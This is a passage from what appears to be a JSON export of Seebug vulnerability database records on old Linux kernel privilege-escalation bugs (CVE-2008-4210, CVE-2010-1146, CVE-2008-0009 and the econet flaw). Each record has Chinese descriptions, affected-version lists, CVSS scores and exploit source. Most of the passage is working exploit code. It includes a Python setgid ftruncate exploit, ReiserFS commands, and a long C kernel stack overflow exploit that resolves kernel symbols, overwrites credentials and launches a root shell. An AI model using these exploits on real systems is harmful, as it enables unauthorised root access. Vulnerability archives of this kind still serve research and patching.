exploit failed!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] launching root shell!\\n");\r\n\texecl("/bin/sh", "/bin/sh", NULL);\r\n}\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70421"}, {"lastseen": "2017-11-19T21:27:29", "description": "BUGTRAQ ID: 31368\r\nCVE ID\uff1aCVE-2008-4210\r\nCNCVE ID\uff1aCNCVE-20084210\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux\u5185\u6838'truncate()'\u548c'ftruncate()'\u51fd\u6570\u5b58\u5728\u8bbe\u8ba1\u9519\u8bef\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u63d0\u5347\u7279\u6743\u3002\r\n\u5f53\u5efa\u7acb\u6587\u4ef6\u65f6\uff0copen()/creat()\u5141\u8bb8\u901a\u8fc7\u6a21\u5f0f\u53c2\u6570\u8bbe\u7f6esetgid\u4f4d\uff0c\u7531\u4e8ebsdgroups 
mount\u9009\u9879\u6216\u5728setgid\u76ee\u5f55\u4e2d\u5efa\u7acb\u6587\u4ef6\uff0c\u7528\u6237\u4e0d\u5c5e\u4e8e\u65b0\u6587\u4ef6\u7684\u7ec4\u7684\u6210\u5458\u3002\u7528\u6237\u53ef\u4ee5\u4f7f\u7528ftruncate()\u548cmemory-mapped I/O\u4f7f\u65b0\u6587\u4ef6\u6210\u4e3a\u4efb\u610f\u4e24\u8fdb\u5236\uff0c\u83b7\u5f97\u6b64\u7ec4\u7684\u7279\u6743\uff0c\u539f\u56e0\u662f\u8fd9\u4e9b\u64cd\u4f5c\u6ca1\u6709\u6e05\u9664setgid\u4f4d\u3002\r\n\n\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18 \r\n+ Debian Linux 4.0 sparc\r\n+ Debian Linux 4.0 s/390\r\n+ Debian Linux 4.0 powerpc\r\n+ Debian Linux 4.0 mipsel\r\n+ Debian Linux 4.0 mips\r\n+ Debian Linux 4.0 m68k\r\n+ Debian 
Linux 4.0 ia-64\r\n+ Debian Linux 4.0 ia-32\r\n+ Debian Linux 4.0 hppa\r\n+ Debian Linux 4.0 arm\r\n+ Debian Linux 4.0 amd64\r\n+ Debian Linux 4.0 alpha\r\n+ Debian Linux 4.0\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 
2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.14 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13 \r\nLinux kernel 2.6.13 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.10 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.2 \r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1 \r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 
-test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6 \r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\r\n\n \u53ef\u5347\u7ea7\u5230\u6700\u65b0\u7684Linux\u5185\u6838\uff1a\r\n<a href=http://www.linux.org/ target=_blank>http://www.linux.org/</a>", "cvss3": {}, "published": "2008-09-27T00:00:00", "type": "seebug", "title": "Linux Kernel 'truncate()'\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-4210"], "modified": "2008-09-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4118", "id": "SSV:4118", "sourceData": "\n #!/usr/bin/env python\r\nimport os\r\nimport mmap\r\nbin = file("/usr/bin/id").read()\r\nfd = os.open("id", os.O_RDWR | os.O_CREAT | os.O_EXCL, 02750)\r\nos.ftruncate(fd, len(bin))\r\nm = mmap.mmap(fd, len(bin))\r\nm[:] = bin\r\nm.flush()\r\n \r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4118", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:13:29", "description": "BUGTRAQ ID: 39344\r\nCVE ID: CVE-2010-1146\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux 
Kernel\u7684ReiserFS\u6587\u4ef6\u7cfb\u7edf\u5b9e\u73b0\u6ca1\u6709\u6b63\u786e\u5730\u9650\u5236\u5bf9.reiserfs_priv\u76ee\u5f55\u7684\u8bbf\u95ee\uff0c\u672c\u5730\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539ACL\u6216\u6269\u5c55\u5c5e\u6027\u83b7\u5f97 root\u6743\u9650\u63d0\u5347\u3002\u6210\u529f\u653b\u51fb\u8981\u6c42\u7cfb\u7edf\u6b63\u5728\u4f7f\u7528ReiserFS\u6587\u4ef6\u7cfb\u7edf\u3002\n\nLinux kernel 2.6.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blob;f=fs/reiserfs/xattr.c;h=81f09fab8ae476ccbdb9547d226e397e1b8cb6d1;hb=HEAD", "cvss3": {}, "published": "2010-04-12T00:00:00", "title": "Linux Kernel ReiserFS\u6587\u4ef6\u7cfb\u7edf\u5b9e\u73b0\u7ed5\u8fc7\u5b89\u5168\u9650\u5236\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1146"], "modified": "2010-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19436", "id": "SSV:19436", "sourceData": "\n \u4ee5root\uff1a\r\ntruncate --size 64M test.reiserfs\r\nmkreiserfs -f test.reiserfs\r\nmkdir /mnt/test\r\nmount -o loop,rw,user_xattr test.reiserfs /mnt/test\r\nsetfattr -n user.test -v myvalue /mnt/test\r\n\r\n\u4ee5\u666e\u901a\u7528\u6237\uff1a\r\nls -l /mnt/test/.reiserfs_priv/xattrs/2.0\r\nrm /mnt/test/.reiserfs_priv/xattrs/2.0/user.test # Whoops\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19436", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:46:54", "description": "BUGTRAQ ID: 27799\r\nCVE(CAN) ID: CVE-2008-0009\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux 
Kernel\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63d0\u5347\u81ea\u5df1\u7684\u6743\u9650\u3002\r\n\r\nLinux Kernel\u7684fs/splice.c\u6587\u4ef6\u4e2d\u7684vmsplice_to_user()\u51fd\u6570\u9519\u8bef\u5730\u5f15\u7528\u4e86\u7528\u6237\u63d0\u4f9b\u7684\u5185\u5b58\u6307\u9488:\r\n\r\n---8<--- fs/splice.c:1378 ---8<---\r\n error = get_user(base, &iov->iov_base);\r\n /* ... */\r\n if (unlikely(!base)) {\r\n error = -EFAULT;\r\n break;\r\n }\r\n /* ... */\r\n sd.u.userptr = base;\r\n /* ... */\r\n size = __splice_from_pipe(pipe, &sd, pipe_to_user);\r\n---8<--- fs/splice.c:1401 ---8<---\r\n\r\n\u8fd9\u6bb5\u4ee3\u7801\u6ca1\u6709\u9a8c\u8bc1\u8fd9\u4e9b\u6307\u9488\u3002__splice_from_pipe()\u5047\u8bbe\u8fd9\u4e9b\u6307\u9488\u4e3a\u6709\u6548\u7684\u7528\u6237\u5185\u5b58\u6307\u9488\uff0c\u6ca1\u6709\u6267\u884c\u4efb\u4f55\u9a8c\u8bc1\u3002\u51fd\u6570\u7528pipe_to_user()\u4e2d\u7684__copy_to_user_inatomic()\u51fd\u6570\u5f15\u7528\u4e86\u6307\u9488\uff0c\u4ee5\u4fbf\u5c06\u6570\u636e\u5199\u5165\u7528\u6237\u8fdb\u7a0b\u5185\u5b58\uff0c\u5bfc\u81f4\u53ef\u80fd\u5c06\u4ece\u7ba1\u9053\u8bfb\u53d6\u7684\u4efb\u610f\u6570\u636e\u5199\u5165\u5230\u5185\u6838\u5185\u5b58\u3002\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u7279\u5236\u7684vmsplice()\u7cfb\u7edf\u8c03\u7528\u5bfc\u81f4\u83b7\u5f97root\u7528\u6237\u6743\u9650\u3002\r\n\n\nLinux kernel 2.6.22 - 2.6.24\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.24.1.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.24.1.bz2</a>", "cvss3": {}, "published": "2008-02-22T00:00:00", "title": "Linux Kernel 
leverages three vulnerabilities to escalate privileges. \n * The primary vulnerability is a kernel stack overflow, not a stack buffer \n * overflow as the CVE description incorrectly states. I believe this is the\n * first public exploit for a kernel stack overflow, and it turns out to be \n * a bit tricky due to some particulars of the econet vulnerability. A full \n * breakdown of the exploit is forthcoming.\n *\n * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <stddef.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <syscall.h>\n#include <inttypes.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/wait.h>\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n#include <sys/ipc.h>\n#include <sys/sem.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n#include <sys/resource.h>\n#include <sys/syscall.h>\n#include <netinet/in.h>\n#include <net/if.h>\n\n#define IOVS 446\n#define NPROC 1024\n#define KSTACK_SIZE 8192\n\n#define KSTACK_UNINIT 0\n#define KSTACK_UPPER 1\n#define KSTACK_LOWER 2\n#define KSTACK_DIE 3\n#define KSTACK_PARENT 4\n#define KSTACK_CLOBBER 5\n\n#define LEAK_BASE 0xffff880000000000\n#define LEAK_TOP 0xffff8800c0000000\n#define LEAK_DEPTH 500\n#define LEAK_OFFSET 32 \n\n#define NR_IPC 0x75\n#define NR_WAIT4 0x72\n#define SEMCTL 0x3\n\n#ifndef PF_ECONET\n#define PF_ECONET 19\n#endif\n\n#define STACK_OFFSET 6\n#define RESTART_OFFSET 40\n\nstruct ec_addr {\n\tunsigned char station;\n\tunsigned char net;\n};\n\nstruct sockaddr_ec {\n\tunsigned short sec_family;\n\tunsigned char port;\n\tunsigned char cb;\n\tunsigned char type;\n\tstruct ec_addr addr;\n\tunsigned long cookie;\n};\n\nstruct ipc64_perm {\n\tuint32_t key;\n\tuint32_t uid;\n\tuint32_t gid;\n\tuint32_t cuid;\n\tuint32_t cgid;\n\tuint32_t mode;\n\tuint16_t seq;\n\tuint16_t __pad2;\n\tunsigned long __unused1;\n\tunsigned long 
__unused2;\n};\n\nstruct semid64_ds {\n\tstruct ipc64_perm sem_perm;\n\tunsigned long sem_otime;\n\tunsigned long __unused1;\n\tunsigned long sem_ctime;\n\tunsigned long __unused;\n\tunsigned long sem_nsems;\n\tunsigned long __unused3;\n\tunsigned long __unused4;\n};\n\nunion semun {\n\tint val;\n\tstruct semid_ds *buf;\n\tunsigned short *array;\n\tstruct seminfo *__buf;\n};\n\nstruct region {\n\tunsigned long parent;\n\tunsigned long addrs[NPROC];\n};\nstruct region *region;\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\nunsigned long ia32_sysret;\n \nvoid __attribute__((regparm(3)))\nkernel_code(void)\n{\n\tcommit_creds(prepare_kernel_cred(0));\n}\n\nvoid\npayload_parent(void)\n{\n\tasm volatile (\n\t\t\"mov $kernel_code, %rax\\n\"\n\t\t\"call *%rax\\n\"\n\t);\n}\n\nvoid\npayload_child(void)\n{\n\tasm volatile (\n\t\t\"movq $payload_parent, (%0)\\n\"\n\t\t\"jmpq *%1\\n\"\n\t\t:\n\t\t: \"r\"(region->parent + RESTART_OFFSET), \"r\"(ia32_sysret)\n\t);\n}\n\nunsigned long\nget_kstack(void)\n{\n\tint i, size, offset;\n\tunion semun *arg;\n\tstruct semid_ds dummy;\n\tstruct semid64_ds *leaked;\n\tchar *stack_start, *stack_end;\n\tunsigned char *p;\n\tunsigned long kstack, *ptr;\n\n\t/* make sure our argument is 32-bit accessible */\n\targ = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\n\tif (arg == MAP_FAILED) {\n\t\tprintf(\"[-] failure mapping memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\t/* map a fake stack to use during syscall */\n\tstack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\n\tif (stack_start == MAP_FAILED) {\n\t\tprintf(\"[-] failure mapping memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\tstack_end = stack_start + 4096;\n\n\tmemset(arg, 0, sizeof(union 
semun));\n\tmemset(&dummy, 0, sizeof(struct semid_ds));\n\targ->buf = &dummy;\n\n\t/* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */\n\tasm volatile (\n\t\t\"push %%rax\\n\"\n\t\t\"push %%rbx\\n\"\n\t\t\"push %%rcx\\n\"\n\t\t\"push %%rdx\\n\"\n\t\t\"push %%rsi\\n\"\n\t\t\"push %%rdi\\n\"\n\t\t\"movl %0, %%eax\\n\"\n\t\t\"movl %1, %%ebx\\n\"\n\t\t\"movl %2, %%ecx\\n\"\n\t\t\"movl %3, %%edx\\n\"\n\t\t\"movl %4, %%esi\\n\"\n\t\t\"movq %5, %%rdi\\n\"\n\t\t\"movq %%rsp, %%r8\\n\"\n\t\t\"movq %6, %%rsp\\n\"\n\t\t\"push %%r8\\n\"\n\t\t\"int $0x80\\n\"\n\t\t\"pop %%r8\\n\"\n\t\t\"movq %%r8, %%rsp\\n\"\n\t\t\"pop %%rdi\\n\"\n\t\t\"pop %%rsi\\n\"\n\t\t\"pop %%rdx\\n\"\n\t\t\"pop %%rcx\\n\"\n\t\t\"pop %%rbx\\n\"\n\t\t\"pop %%rax\\n\"\n\t\t:\n\t\t: \"r\"(NR_IPC), \"r\"(SEMCTL), \"r\"(0), \"r\"(0), \"r\"(IPC_SET), \"r\"(arg), \"r\"(stack_end)\n\t\t: \"memory\", \"rax\", \"rbx\", \"rcx\", \"rdx\", \"rsi\", \"rdi\", \"r8\"\n\t);\n\n\t/* naively extract a pointer to the kstack from the kstack */\n\tp = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;\n\tkstack = *(unsigned long *) p;\n\n\tif (kstack < LEAK_BASE || kstack > LEAK_TOP) {\n\t\tprintf(\"[-] failed to leak a suitable kstack address, try again!\\n\");\n\t\texit(1);\n\t}\n\tif ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {\n\t\tprintf(\"[-] failed to leak a suitable kstack address, try again!\\n\");\n\t\texit(1);\n\t}\n\n\tkstack = kstack & ~0x1fff;\n\t\n\treturn kstack;\n}\n\nunsigned long\nget_symbol(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy, sym[512];\n\tint ret = 0;\n \n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (!f) {\n\t\treturn 0;\n\t}\n \n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sym);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sym)) {\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\n\t\t\tfclose(f);\n\t\t\treturn 
addr;\n\t\t}\n\t}\n\tfclose(f);\n \n\treturn 0;\n}\n\nint\nget_adjacent_kstacks(void)\n{\n\tint i, ret, shm, pid, type;\n\n\t/* create shared communication channel between parent and its children */\n\tshm = shm_open(\"/halfnelson\", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);\n\tif (shm < 0) {\n\t\tprintf(\"[-] failed creating shared memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tret = ftruncate(shm, sizeof(struct region));\n\tif (ret != 0) {\n\t\tprintf(\"[-] failed resizing shared memory, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tregion = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);\n\tmemset(region, KSTACK_UNINIT, sizeof(struct region));\n\n\t/* parent kstack self-discovery */\n\tregion->parent = get_kstack();\n\n\tprintf(\"[+] found parent kstack at 0x%lx\\n\", region->parent);\n\n\t/* fork and discover children with adjacently-allocated kernel stacks */\n\tfor (i = 0; i < NPROC; ++i) {\n\t\tpid = fork();\n\n\t\tif (pid > 0) {\n\t\t\ttype = KSTACK_PARENT;\n\t\t\tcontinue;\n\t\t} else if (pid == 0) {\n\t\t\t/* children do kstack self-discovery */\n\t\t\tregion->addrs[i] = get_kstack();\n\n\t\t\t/* children sleep until parent has found adjacent children */\n\t\t\twhile (1) {\n\t\t\t\tsleep(1);\n\t\t\t\tif (region->addrs[i] == KSTACK_DIE) {\n\t\t\t\t\t/* parent doesn't need us :-( */\n\t\t\t\t\texit(0);\n\t\t\t\t} else if (region->addrs[i] == KSTACK_UPPER) {\n\t\t\t\t\t/* we're the upper adjacent process */\n\t\t\t\t\ttype = KSTACK_UPPER;\n\t\t\t\t\tbreak;\n\t\t\t\t} else if (region->addrs[i] == KSTACK_LOWER) {\n\t\t\t\t\t/* we're the lower adjacent process */\n\t\t\t\t\ttype = KSTACK_LOWER;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\tbreak;\n\t\t} else {\n\t\t\tprintf(\"[-] fork failed, aborting!\\n\");\n\t\t\texit(1);\n\t\t}\n\t}\n\n\treturn type;\n}\n\nvoid\ndo_parent(void)\n{\n\tint i, j, upper, lower;\n\n\t/* parent sleeps until we've discovered all the child kstacks */\n\twhile (1) {\n\t\tsleep(1);\n\t\tfor (i = 0; i 
< NPROC; ++i) {\n\t\t\tif (region->addrs[i] == KSTACK_UNINIT) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (i == NPROC) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\t/* figure out if we have any adjacent child kstacks */\n\tfor (i = 0; i < NPROC; ++i) {\n\t\tfor (j = 0; j < NPROC; ++j) {\n\t\t\tif (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (j != NPROC) {\n\t\t\tbreak;\n\t\t}\n\t}\n\tif (i == NPROC && j == NPROC) {\n\t\tprintf(\"[-] failed to find adjacent kstacks, try again!\\n\");\n\t\texit(1);\n\t}\n\n\tupper = i;\n\tlower = j;\n\n\tprintf(\"[+] found adjacent children kstacks at 0x%lx and 0x%lx\\n\", region->addrs[lower], region->addrs[upper]);\n\n\t/* signal to non-adjacent children to die */\n\tfor (i = 0; i < NPROC; ++i) {\n\t\tif (i != upper && i != lower) {\n\t\t\tregion->addrs[i] = KSTACK_DIE;\n\t\t}\n\t}\n\n\t/* signal adjacent children to continue on */\n\tregion->addrs[upper] = KSTACK_UPPER;\n\tregion->addrs[lower] = KSTACK_LOWER;\n\n\t/* parent sleeps until child has clobbered the fptr */\n\twhile (1) {\n\t\tsleep(1);\n\t\tif (region->parent == KSTACK_CLOBBER) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tprintf(\"[+] escalating privileges...\\n\");\n\n\t/* trigger our clobbered fptr */\n\tsyscall(__NR_restart_syscall);\n\n\t/* our privileges should be escalated now */\n\tif (getuid() != 0) {\n\t\tprintf(\"[-] privilege escalation failed, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] launching root shell!\\n\");\n\n\texecl(\"/bin/sh\", \"/bin/sh\", NULL);\n}\n\nvoid\ndo_child_upper(void)\n{\n\tint i, ret, eco_sock;\n\tstruct sockaddr_ec eco_addr;\n\tstruct msghdr eco_msg;\n\tstruct iovec iovs[IOVS];\n\tstruct ifreq ifr;\n\tchar *target;\n\n\t/* calculate payload target, skip prologue */\n\ttarget = (char *) payload_child;\n\ttarget += 4;\n\t\n\t/* give lower child a chance to enter its wait4 call */\n\tsleep(1);\n\n\t/* write some zeros */\n\tfor (i = 0; i < STACK_OFFSET; ++i) 